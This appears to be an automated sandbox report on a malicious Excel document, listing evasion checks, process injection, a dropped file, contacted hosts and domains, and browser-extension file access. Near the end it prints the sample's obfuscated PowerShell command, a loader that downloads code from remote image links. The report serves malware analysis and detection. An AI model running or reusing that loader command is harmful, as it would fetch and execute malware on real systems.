              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\rugtucwProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\rugtucwProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\rugtucwProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\rugtucwProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\rugtucwProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\rugtucwProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\rugtucwProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\rugtucwProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\rugtucwProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\rugtucwProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\rugtucwProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: #20240627_Edlen_A.xlsStream path 'Workbook' entropy: 7.98995851121 (max. 8.0)
              Source: 26330000.0.drStream path 'Workbook' entropy: 7.99021384416 (max. 8.0)
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

              Malware Analysis System Evasion

              barindex
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\IDEJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\IDEJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeCode function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpi,lstrcmpi,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpi,lstrcmpi,lstrcmpi,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpi,GetCommandLineA,StrStrIA,lstrcmpi,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpi,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep,22_2_00083862
              Source: C:\Windows\SysWOW64\explorer.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_24-890
              Source: C:\Users\user\AppData\Roaming\rugtucwMemory allocated: 2D0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\rugtucwMemory allocated: 23B0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\rugtucwMemory allocated: 400000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_000816C7 GetCurrentProcessId,GetCurrentThreadId,CreateToolhelp32Snapshot,Thread32First,OpenThread,SuspendThread,ResumeThread,CloseHandle,Thread32Next,CloseHandle,22_2_000816C7
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\rugtucwThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 846Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1515Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2052Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7806Jump to behavior
              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 624Jump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3368Thread sleep time: -300000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exe TID: 3464Thread sleep time: -120000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3608Thread sleep time: -60000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3580Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3656Thread sleep count: 2052 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3656Thread sleep count: 7806 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3692Thread sleep time: -60000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3696Thread sleep time: -11068046444225724s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3696Thread sleep time: -600000s >= -30000sJump to behavior
              Source: C:\Windows\explorer.exe TID: 1340Thread sleep time: -240000s >= -30000sJump to behavior
              Source: C:\Windows\System32\taskeng.exe TID: 4028Thread sleep time: -120000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\rugtucw TID: 4064Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\explorer.exe TID: 3204Thread sleep count: 31 > 30
              Source: C:\Windows\SysWOW64\explorer.exe TID: 3204Thread sleep time: -31000s >= -30000s
              Source: C:\Windows\SysWOW64\explorer.exe TID: 3188Thread sleep count: 33 > 30
              Source: C:\Windows\SysWOW64\explorer.exe TID: 3188Thread sleep time: -33000s >= -30000s
              Source: C:\Windows\explorer.exe TID: 3328Thread sleep count: 33 > 30
              Source: C:\Windows\explorer.exe TID: 3328Thread sleep time: -33000s >= -30000s
              Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
              Source: C:\Windows\explorer.exeLast function: Thread delayed
              Source: C:\Windows\explorer.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
              Source: C:\Windows\explorer.exeLast function: Thread delayed
              Source: C:\Windows\explorer.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_00081D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose,18_2_00081D4A
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_00083ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose,18_2_00083ED9
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_00082B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,18_2_00082B15
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 21_2_0008255C lstrcatW,PathAppendW,FindFirstFileW,RtlZeroMemory,lstrcatW,PathAppendW,lstrcatW,PathAppendW,StrStrIW,FindNextFileW,FindClose,21_2_0008255C
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_000815BE RtlZeroMemory,SHGetSpecialFolderPathW,lstrcatW,PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,PathCombineW,PathMatchSpecW,PathCombineW,FindNextFileW,FindClose,22_2_000815BE
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_000814D8 wsprintfW,FindFirstFileW,wsprintfW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,22_2_000814D8
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_000813FE wsprintfW,FindFirstFileW,wsprintfW,RemoveDirectoryW,FindNextFileW,FindClose,22_2_000813FE
              Source: C:\Windows\explorer.exeCode function: 23_2_000E1EB4 FindFirstFileW,23_2_000E1EB4
              Source: C:\Windows\explorer.exeCode function: 23_2_000E1DB0 FindFirstFileW,23_2_000E1DB0
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_00086512 GetSystemInfo,18_2_00086512
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\rugtucwThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
              Source: explorer.exe, 0000000E.00000000.464250384.00000000001D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}7
              Source: explorer.exe, 0000000E.00000000.466511830.0000000003E59000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
              Source: explorer.exe, 0000000E.00000000.466511830.0000000003E59000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
              Source: explorer.exe, 0000000E.00000000.466511830.0000000003E59000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}eeab7790
              Source: explorer.exe, 0000000E.00000002.607048894.0000000007948000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0K
              Source: explorer.exe, 0000000E.00000000.466511830.0000000003DB1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0
              Source: explorer.exe, 0000000E.00000000.465326275.00000000025E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0a
              Source: explorer.exe, 0000000E.00000002.607048894.0000000007948000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000v
              Source: explorer.exe, 0000000E.00000000.466511830.0000000003E59000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}100\4&20
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSystem information queried: CodeIntegrityInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_00081E4C CloseHandle,RtlMoveMemory,LoadLibraryA,GetProcAddress,LdrProcessRelocationBlock,22_2_00081E4C
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_000816C7 GetCurrentProcessId,GetCurrentThreadId,CreateToolhelp32Snapshot,Thread32First,OpenThread,SuspendThread,ResumeThread,CloseHandle,Thread32Next,CloseHandle,22_2_000816C7
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_000E9247 RtlDeleteCriticalSection,RtlDeleteCriticalSection,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,18_2_000E9247
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_00081000 GetProcessHeap,RtlAllocateHeap,18_2_00081000
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\AppData\Roaming\rugtucwMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Windows\explorer.exeFile created: rugtucw.14.drJump to dropped file
              Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 77.232.129.190 80Jump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeDomain query: paste.ee
              Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 188.114.96.3 443Jump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeDomain query: prolinice.ga
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3520, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3620, type: MEMORYSTR
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhD
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread created: C:\Windows\explorer.exe EIP: 3F11960Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Windows\explorer.exeMemory written: PID: 4072 base: 95102D value: 90Jump to behavior
